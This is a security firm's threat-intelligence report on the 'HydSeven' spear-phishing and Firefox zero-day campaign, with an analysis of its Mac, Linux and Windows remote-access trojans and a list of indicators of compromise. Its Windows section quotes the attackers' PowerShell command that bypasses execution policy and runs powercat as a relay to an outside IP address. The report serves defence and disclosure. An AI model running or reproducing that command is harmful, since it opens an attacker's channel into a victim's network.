This is our first threat summary report. For more information on this type of report and why we publish them, click here.
The research team at Prevailion has detected and analyzed Linux and Windows remote-access trojans associated with the advanced threat actor known as “HydSeven.” This threat group initially maintained a relatively low profile through the use of bespoke commodity malware.
However, they caught the attention of the information security community when performing a highly targeted spear-phishing operation in the summer of 2019.
In this campaign, which we have dubbed “Operation BlockChain Gang,” the threat actors used compromised Cambridge University infrastructure to phish and water-hole their targets. In analyzing the campaign, Prevailion has associated two new malware families to this group. In addition to the previously known Mac OS X agent, we’ve recently associated Windows and Linux variants.
By illustrating how potential victims could have been infected by the group and detailing the capabilities of the malware, this report is intended to inform at-risk organizations and help them understand appropriate steps to avoid compromise.
HydSeven appears to add a new twist to a common method of infection via email, known as “phishing.” While this particular technique is not new, victims rarely report actual interactions with threat actors. In this case, the threat actors crafted an innocuous email asking if the target would be willing to look over some applications for an award presumably in their area of expertise. In a statement about the attack, CoinBase reported, “We learned that over 200 individuals were targeted by this attacker.”
It wasn't until after the victim responded, indicating that they would be willing to help, that they were sent the malicious link. That link would bring the victim to a threat actor-controlled “watering-hole” hostname on the Cambridge University domain. If someone visited this website from a Firefox browser, their host machine would be exploited by what was a 0-day exploit, later identified as CVE-2019-11707 and CVE-2019-11708. However, the actors did appear to make one small mistake at first; they did not add a message saying that the webpage could only be rendered in Firefox. Thus, some potential victims were saved from compromise simply because they used their default browser. If someone was unfortunate enough to have visited the website using Firefox, they would have been exploited, and an agent would have been deployed to their workstation.
While other researchers have previously documented the functionality of the Mac OS X payload, Prevailion has, with moderate confidence, associated a Windows and Linux component to this threat actor. We speculate that the threat actors likely did not go through the effort to obtain certificates for Mac OS X and Linux payloads, as those systems are less likely to have antivirus software running on them. These payloads were fully functional remote-access tools that allowed the threat actors to run commands, as well as send and receive data from their command and control servers (C2s).
This case study shows the lengths these advanced actors would go to establish access in a high-value network. Based off that same CoinBase report, it was calculated that only 2.5% of people who received the initial email received that final link. This would suggest that the threat actors expended all this effort to gain access to approximately five organizations, potentially in the financial sector.
This report highlights the emphasis that threat actors are placing on organizations that store and retain significant amounts of data about their customer base. We strongly encourage these organizations to assess their existing risk profiles, implement host-based defenses, and put incident response plans in place prior to an event.
According to a presentation given in October 2019 by a Line employee, potential victims of this campaign received a targeted email from a compromised Cambridge account asking them to “assess the quality of competing projects ... for the [Cambridge University] Adam’s Prize.” The Adam’s Prize is a highly respected contest, held every year by Cambridge and awarded to a person, or persons, who contributed original research to a given discipline, typically within the field of mathematics.
The initial email appeared innocuous at first glance, asking recipients if they would be willing to help evaluate applications for the Adam’s award. These threat actors even went through the process of creating a LinkedIn account for the persona that sent the emails. While creating a fake profile has become typical of targeted attacks, corresponding with the victims was highly abnormal. In this particular case, correspondence went back and forth — with victims inquiring about requirements and terms of participation — but the link to the water-holed hostname was still not sent until the victim agreed to help. This unique tactic reveals that the threat actors are expanding the social engineering aspect and displaying a level of audacity far beyond the norm.
The email contained a link with a unique username and password for the victim. The webpage seemed innocuous, with only one suspicious aspect: a message indicating that the page would only work when viewed in Firefox with a link to download the latest version. We speculate that the actors added this particular message after reading an article such as this one, by Robert Heaton. When Heaton visited the water-holed site, he did not get the Firefox prompt. In his words: if “Gregory” had added just 7 extra words to this page - “THIS PAGE MUST BE VIEWED IN FIREFOX” - I would have been screwed.
Around the same time, May 20, 2019, CoinBase experienced a similar attack. This was first reported by @SecurityGuyPhil, in a series of tweets. Those tweets were later turned into a medium post, which can be found here.
The Firefox Exploit
“So all in all this looks like a bug collision (not a 1day constructed from the bugfix, not a leak from any of the bug trackers). My guess is that someone was looking for that bug pattern or even specifically for a variant of CVE-2019- and found the bug that way”
Mac OS X Agent
Once the exploit was run, the code would obtain the first-stage agent from the C2 server, located at hxxp://185[.]162[.]131[.]96/i/IconServicesAgent. This agent was analyzed extensively in a series of blog posts by Digita Security, in which it was identified as a variant of “NetWire.” A commercially available “systems administration tool”, NetWire can be purchased online at a rate of $120 per year. Despite its low cost, cracked versions of this software are also available to download for free on the internet.
Of note, while NetWire is commercially available, the sample had a low detection rate when originally submitted to VirusTotal on June 2, 2019. At that time, it was flagged as malicious by only one vendor. Since then, though, several companies have created signatures for this tool. In the course of our investigation, we identified two new samples associated with this group.
Interestingly, one was named “fuck_tencent” — potentially a reference the Chinese conglomerate Tencent Holdings Ltd.
Once installed on the victim machine, the application masqueraded as the “Finder” application. It then attempted to gather host-based credentials and establish persistence. After gathering host-based information and presumably determining that the environment was of interest, it would install the second, more robust payload, later identified as “Ekoms”. Digita Security performed an extensive write-up on this sample, as well, which can be found here.
Like most second-stage remote-access trojans, it would allow the threat actor to deploy keyloggers, grab screenshots, transfer files, and send audio captures. As with the previous tool, when this sample was submitted to VirusTotal, it was not flagged as malicious by any AV vendors. Initial detection rate for the Ekom sample was 0/53 when uploaded on June 20, 2019
Analysis of Linux Agent
During our investigation, the Prevailion team found three elf files designed for Linux-based operating systems. Like most of the Mac samples, when the file was initially uploaded to VirusTotal, it had a detection rate of zero. And, even as of November 10, it's only being detected by three vendors.
Initial detection rate of 0/53 for the Linux agent uploaded on March 29th, 2019
The first agent we analyzed was a fully functional remote-access trojan designed for Red-Hat Linux. We hypothesize that the infection mechanism was similar to the one used to deploy the Mac OS X agent. Once the agent was sent to the machine, it would install itself as a desktop application.
Screenshot of the RC4 embedded within the sample
As in the aforementioned Mac samples, it contained the same RC4 encryption key, used to decrypt a section of code containing the C2 IP address, Host-ID, and Default Group that would be set by the threat actor.
Decrypted output of the encrypted code
When we analyzed this agent, it would gather the machine’s current IP address by making a request to checkip[.]dyndns[.]org. The agent had the ability to gather information about the victim machine and send various commands. Some examples include retrieving:
- Information about the user (getuid, getpwuid)
- Information about the host (gethostname, sysinfo, sysconf, cpuinfo)
- Information about environment variables (getenv)
- Information about process and the parent process
- Run commands (from /bin/bash or /bin/sh)
- Read, write, and delete files
- Make and remove directories
- Kill a process
The agent would persist by auto-starting on login. The functionality suggested its primary purpose was to act as a proxy, or relay, to send commands and data from the threat actors outside the network to other agents within the network. One particular aspect of the agent was the use of a hard-coded user-agent string:
“Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko”
This was of particular note, as the agent was designed for Linux, but this was the typical user-agent string for a Windows operating system version 8.1 or Server 2012.
Analysis of the Windows Agent
While the previous case studies provided insights into how the threat actor performed in the Mac OS X environment, looking at those same C2, we identified another campaign from earlier this year. The two IP addresses referenced in the CoinBase targeting were:
Vitali Kremez, @VK_Intel, later noted that he found a signed Windows binary, with the certificate being issued to “SANJ CONSULTING LTD”. Once the binary was analyzed, it communicated with the same C2 as the Mac OS X malware from the CoinBase attack.
“cmd.exe /c powershell; Set-ExecutionPolicy -ExecutionPolicy Bypass -Scope Process
-Force;. "%s"; powercat -l -p 4000 -r tcp:22.214.171.124:443;
This binary was a compiled version of PowerCat, an open-source framework project written in PowerShell. We have associated additional PowerCat samples with the same threat group.
However, they were not signed by a certificate authority. To avoid detection from common strings, they usedan obfuscator such as “Invoke-Obfuscation”. PowerCat is a fully functional remote-access trojan that:
- Performed upload/download files
- Performed execution of PowerShell commands
- Included functionality for DNSCat2 as an alternative communications channel
- Acted as a relay to other agents inside the network perimeter
Another notable feature of these agents was their ability to act as a relay. This is significant because once the threat actors have access to a relay on the network behind the firewall, there are typically few, if any, appliances in place to detect the lateral movement of the actor. These relay agents allow the threat actors to access more sensitive data hosted on servers that are only accessible once a client has been authenticated and permitted into the local network.
Overlap with Previous Campaigns
One other significant element was the use of a common RC4 key across the Windows, Linux, and Mac-based samples. The use of this shared RC4 key and overlapping C2s led us to believe, with moderate confidence, that all these samples can be associated to the same threat actor. This threat actor group has previously been reported upon as being active in both Japan and Poland.
This threat actor has showcased a number of techniques that would categorize them as an extremely advanced adversary. This campaign highlights the focus on large organizations that store and retain significant amounts of data about their customer base.
While there is currently no single solution to protect every system with 100% fidelity, these products can significantly reduce risk by displaying a pop-up to alert the end user about activity in the background of their system. This gives them a greater opportunity to at least detect abnormalities and potentially avoid a breach.
Organizations should also work on preparing and rehearsing their incident response plans. Thus, if an event does occur, they will have an established procedure regarding who to contact and what to do. Furthermore, in an incident response investigation, it is critical to check the entire network, not just the machines where an alert was detected. This includes Linux-based workstations and servers, as these systems sometimes get overlooked. If you feel that your Linux-based system may have been compromised, guidelines on how to inspect that system can be found here.
While it’s important to have a security team on staff, the end user is always your first line of defense to detect suspicious activity. For example, if someone receives an email asking them to evaluate an international award in economics, and they are not an economist, they should consult their network security staff. If you have host-based firewalls in place and a user suddenly starts seeing a pop-up message about a cURL command connecting to a server in Hong Kong, there may be an issue at hand. Training your employees to take these alerts seriously could prevent a major incident from occurring.
Indicators of Compromise
The following is a list of samples that have been associated with this threat group. This list was comprised from information from Prevailion employees and the open source community.
Exploit Server analyticsfit[.]com/init.js, 54[.]38[.]93[.]182.
Mac Agents 07a4e04ee8b4c8dc0f7507f56dc24db00537d4637afee43dbb9357d4d54f6ff4 97200b2b005e60a1c6077eea56fc4bb3e08196f14ed692b9422c96686fbfc3ad A2e449364b1bc148a19824984010485e2770a2f2e3098a7b59b557a59f735691 Bff5746b0c9eff2301107d914a1d67ccfc71b1eb1a456592d61309a4656d84b2
Linux Agents A981a5fbeff782330871fb8a106466cbe61280536c162b3e3c3cbf441265b437 Be71c7c7ad6a46d984cc1726949b4477a076bda024f54e2cbea1453813f4ac6f f6b9aa26608ca43dec89b71c13a240824ec1e69e835a05ac2c34f284eb824e9f
1fd4d2b24afe772e9e245ea887e7b7546c0e9d5339cfef78549e8d5b0854502d Cd822a2aba7d7beaea443ebeb20528a71cb87e0bd0fad3da5b06e69849ea0d57 c5da6266ed74e0a59d250de106d9885ea6a4088beb15b70415de9703e9041ad4 Ce422218406c1fb31b4b959584d2e655a405e210d0055b6b5aa5b87ff81276f2 7e3378e55e49f93bc1cbe111f65faa89ed0b6765af411bf21547f5a3c909a06f 5fcc28c618d0338944cae76e3df9ad50e579f265e4b44296506f6cfd05faec95 38884986e530050311f8ceb59a84b0a5fa99034233fe8b2c4e24febe9798cd5f 0499aa5c68c59d2d3a484d52d7f1afcc189722ae96dfdde2afd9e12c95085af4